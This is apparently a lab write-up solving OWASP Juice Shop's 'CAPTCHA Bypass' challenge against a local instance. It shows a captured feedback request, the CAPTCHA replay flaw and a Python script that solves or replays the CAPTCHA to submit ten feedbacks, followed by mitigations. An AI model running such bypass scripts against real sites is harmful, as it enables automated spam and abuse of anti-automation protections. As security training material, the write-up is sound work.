Pwning OWASP’s Juice Shop Pt. 20: CAPTCHA Bypass

Challenge: 

Name:  CAPTCHA Bypass

Description: Submit 10 or more customer feedbacks within 10 seconds.

Difficulty: 3 star

Category: Broken Anti-Automation

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-anti-automation.html

Tools used:

Burp, FoxyProxy

Resources used:

None.

Methodology: 

As usual, I started with the expanded description, which provided three possible methods for completing this challenge. Only one looked appealing, however.

Submit 10 or more customer feedbacks within 10 seconds

The Contact Us form for customer feedback contains a CAPTCHA to protect it from being abused through scripting. This challenge is about beating this automation protection.

A completely automated public Turing test to tell computers and humans apart, or CAPTCHA, is a program that allows you to distinguish between humans and computers. First widely used by AltaVista to prevent automated search submissions, CAPTCHAs are particularly effective in stopping any kind of automated abuse, including brute-force attacks. They work by presenting some test that is easy for humans to pass but difficult for computers to pass; therefore, they can conclude with some certainty whether there is a human on the other end.

For a CAPTCHA to be effective, humans must be able to answer the test correctly as close to 100 percent of the time as possible. Computers must fail as close to 100 percent of the time as possible.

• You could prepare 10 browser tabs, solving every CAPTCHA and filling out each feedback form. Then you'd need to very quickly switch through the tabs and submit the forms in under 10 seconds total.
• Should the Juice Shop ever decide to change the challenge into "Submit 100 or more customer feedbacks within 60 seconds" or worse, you'd probably have a hard time keeping up with any tab-switching approach.
• Investigate closely how the CAPTCHA mechanism works and try to find either a vulnerability or an automated way of solving it dynamically. Wrap this into a script (in whatever programming language you prefer) that repeats this 10 times.

First let’s figure out how the CAPTCHA mechanism works. I set up Burp and FoxyProxy, then made my way to the Customer Feedback form.

Customer Feedback form (screenshot): Author "anonymous"; Comment "burpsuite go brrrr" (18/160 characters); Rating; CAPTCHA "What is 7+6+1 ?" with Result 14; Submit.

Nothing on the screen jumped out at me, so after filling in the form, I sent it off to Burp for analysis.

The captured request (transcribed from the Burp Repeater screenshot):

    POST /api/Feedbacks/ HTTP/1.1
    Host: localhost:3000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Content-Type: application/json
    Content-Length: 84
    Origin: http://localhost:3000
    Connection: close
    Referer: http://localhost:3000/
    Cookie: language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; con...

    {"captchaId":0,"captcha":"14","comment":"burpsuite go brrrr (anonymous)","rating":1}
If you change the rating to “0”, you can also solve the “Zero Stars” challenge.

The CAPTCHA travels as two plain JSON fields: “captchaId” (here 0) and the answer “captcha” (here “14”), and nothing ties that pair to a single submission. The answer to captchaId 0 is always 14, and the server keeps accepting the same pair, so a CAPTCHA is never retired once it has been answered. That means all that really needs to be done to bypass the CAPTCHA and complete the challenge is to send the request to Burp’s Repeater tab and spam the “Send” button until you see…

You successfully solved a challenge: CAPTCHA Bypass (Submit 10 or more customer feedbacks within 10 seconds.)
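Below is the scripted version of the third approach from the expanded description (“wrap this into a script that repeats this 10 times”), written for this write-up as an added example; it is not code from the original post or from the Juice Shop project. It assumes a fresh CAPTCHA can be fetched from GET /rest/captcha as JSON with “captchaId” and “captcha” fields, that the expression only uses integers with +, - and *, and that the server compares the answer as a string (as the captured body “captcha”:“14” suggests). The base URL, function names and sample comments are mine. With replay=True it does in code what spamming Send in Repeater did above: it reuses one solved pair, which only works because the server never retires an answered CAPTCHA. With replay=False it solves a new CAPTCHA for every post, so it keeps working even if that replay hole were closed.

```python
"""Added example (not from the original post or the Juice Shop project):
solve Juice Shop's arithmetic CAPTCHA without eval() and submit 10
feedbacks inside the 10-second challenge window.

Assumptions: GET /rest/captcha returns {"captchaId": int, "captcha": str,
...}; expressions contain only integers and + - *; the server checks the
answer as a string. The Juice Shop instance location is a guess.
"""
import ast
import json
import operator
import time
import urllib.request

BASE_URL = "http://localhost:3000"  # assumed Juice Shop location

# Only the operators the CAPTCHA generator is assumed to emit.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def solve_captcha(expression: str) -> int:
    """Evaluate e.g. '7+6+1' -> 14 by walking the AST instead of calling
    eval(), so nothing the server sends back can run as code on our side.
    A trailing '?' (as rendered in the form) is tolerated."""
    cleaned = expression.strip().rstrip("?").strip()
    tree = ast.parse(cleaned, mode="eval")

    def walk(node: ast.AST) -> int:
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported CAPTCHA token: {type(node).__name__}")

    return walk(tree)


def build_feedback(captcha_id: int, answer: int, comment: str,
                   rating: int = 1, author: str = "anonymous") -> dict:
    """Reproduce the body the front end sends: the author is appended to the
    comment and the CAPTCHA answer is a string. rating=0 additionally solves
    the separate 'Zero Stars' challenge."""
    return {
        "captchaId": captcha_id,
        "captcha": str(answer),
        "comment": f"{comment} ({author})",
        "rating": rating,
    }


def serialize(payload: dict) -> bytes:
    """Compact JSON, the same shape as the 84-byte body in the captured request."""
    return json.dumps(payload, separators=(",", ":")).encode()


def _get_json(url: str) -> dict:
    with urllib.request.urlopen(url, timeout=5) as resp:
        return json.load(resp)


def _post_json(url: str, payload: dict) -> int:
    req = urllib.request.Request(
        url, data=serialize(payload),
        headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status


def spam_feedback(count: int = 10, replay: bool = False) -> list:
    """Submit `count` feedbacks back to back and return each HTTP status.
    replay=False fetches and solves a fresh CAPTCHA per post (the scripted
    solver route). replay=True reuses the first solved pair, which is what
    spamming Send in Repeater does; it works only because the server never
    invalidates a CAPTCHA after it has been answered correctly."""
    captcha = _get_json(f"{BASE_URL}/rest/captcha")  # assumed endpoint
    answer = solve_captcha(captcha["captcha"])
    statuses = []
    for i in range(count):
        if i and not replay:
            captcha = _get_json(f"{BASE_URL}/rest/captcha")
            answer = solve_captcha(captcha["captcha"])
        payload = build_feedback(captcha["captchaId"], answer, f"automated feedback {i}")
        statuses.append(_post_json(f"{BASE_URL}/api/Feedbacks/", payload))
    return statuses


if __name__ == "__main__":
    start = time.monotonic()
    print(spam_feedback(10, replay=True))
    print(f"sent in {time.monotonic() - start:.2f}s (challenge window is 10s)")
```

Run it against a local Juice Shop with `python3 captcha_bypass.py`; ten HTTP 201 responses well inside the window solves the challenge either way. The AST walker matters more than it looks: a lazy script would `eval()` whatever string the CAPTCHA endpoint returns, which hands code execution to anyone who can tamper with that response.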

Prevention and Mitigation Strategies:

Use a real CAPTCHA rather than a home-grown one and, whichever CAPTCHA is used, invalidate each challenge server-side as soon as it has been answered so a solved captchaId/answer pair cannot be replayed; only allow registered users to submit feedback; and rate-limit the number of feedback comments each registered user may submit in a given time span.

Lessons Learned and Things Worth Mentioning: 

  1. A CAPTCHA only does its job if every challenge can be used exactly once and the answer is checked server-side. A home-brewed arithmetic CAPTCHA whose ID and answer can simply be replayed is never going to be as sophisticated as the real thing.
  2. While the other two methods suggested in the expanded description would both work, I chose this method because every bit of practice I can get with Burp Suite helps me get more comfortable with it.
